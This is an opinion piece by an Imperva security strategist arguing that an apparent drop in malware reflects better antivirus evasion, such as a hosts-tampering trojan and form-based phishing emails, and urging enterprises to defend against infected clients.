Is malware on the decline, or is evasion on the rise?
Noa Bar Yosef, senior security strategist, Imperva
In February, PandaLabs published a malware findings report that indicated the number of their infected clients had decreased in February in relation to January.
The data for this research was gathered from the company's anti-virus (AV) tool. On the face of it, this is a surprising fact, as security researchers are continuously discussing an epidemic of client-side threats, and the consistent increase in malware and their variants.
Then why this “decrease” in malware?
As hackers become more sophisticated, naturally, so do evasion techniques. Much of today's malware is developed to bypass security controls, such as anti-virus. Moreover, hackers are releasing new variants of client-side threats at a rapid rate. Anti-malware detection tools must deal with the nearly impossible task of keeping up-to-date with all these new and old variants.
Detection evasion techniques have advanced to the point where different trojans are not detected by some common AV products for more than a week.
For example, hackers may strip out common headers, which which evades AV and IPS tools. Other types of malware are used to sting victims very quickly so even if AV detects the threat, it is too late.
Take the re-emergence of what Imperva has dubbed the "Boy in the Browser" (BitB) trojan. This trojan, when executed on the victim's machine, reroutes the victim's traffic to pass through an attacker-controlled server. The BitB does this by tampering with the mapping of the hostname to the network address mechanism.
Once this persistent change to the configuration file is performed, the exploit code is then removed from victims' machines. As a consequence, even if that user updated their latest AV content the next time they switched on their computer, no AV mechanism would detect this modification, as the malware is not even installed on the machine.
Another built-in evasion technique used by hackers is to use HTML phishing emails. Currently, different browsers employ anti-phishing techniques -- Google's Safe Browsing, for instance, is based on blacklisting sites by URL.
This mechanism alerts the victim of a malicious site in case they decide to click on the phishing link. However, in an HTML phishing campaign there is no such embedded link to alert the user. Rather, the hacker attaches a web-based form to the email. The victim in this case completes the form and those sensitive details are sent to an attacker-controlled server.
Another method to evade detection is to use multiple vehicles for malware distribution. A recent report has shown that anti-virus tools may flag executables as malicious when distributed in one manner, such as via an email.
However, when distributed in a different manner, such as via a USB thumb driver, those same executables will bypass the anti-virus controls.
Although anti-virus tools may show a drop in malware, in reality, client-side malware will just continue to increase. Furthermore, ensuring security on the client's machine has gone the way of Sisyphus.
Enterprises must stand up, take responsibility and deal with threats, instead of relying on consumers for effective security means.
While providers should urge consumers to be prudent, they must learn how to interact with infected consumers and create a safe business environment for them regardless of the broader threat. These solutions include identifying account takeover, defeating phishing campaigns, detecting infected clients, interacting with compromised clients and even sandboxing client sessions.